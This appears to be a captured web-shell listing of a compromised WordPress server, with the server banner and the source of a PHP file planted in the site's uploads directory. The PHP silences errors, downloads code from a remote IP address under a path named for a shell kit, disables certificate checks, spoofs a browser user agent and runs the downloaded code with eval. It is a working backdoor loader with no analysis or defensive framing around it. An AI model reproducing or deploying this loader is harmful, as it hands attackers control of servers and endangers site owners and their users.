|
Server : Apache System : Linux vps-1289444.devslamantis.cl 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64 User : vspt ( 1013) PHP Version : 7.4.33 Disable Function : NONE Directory : /home/vspt/public_html/casavalle.vsptdigital.cl/wp-content/uploads/2026/07/ |
<?php
/* direct */
@error_reporting(0);
@ini_set('display_errors', 0);
$url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt';
if(function_exists('curl_init')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$res = curl_exec($ch);
curl_close($ch);
if($res && strlen($res) > 10){
$res = ltrim($res, "\xef\xbb\xbf");
@eval('?>' . $res);
exit;
}
}
echo "active";
?>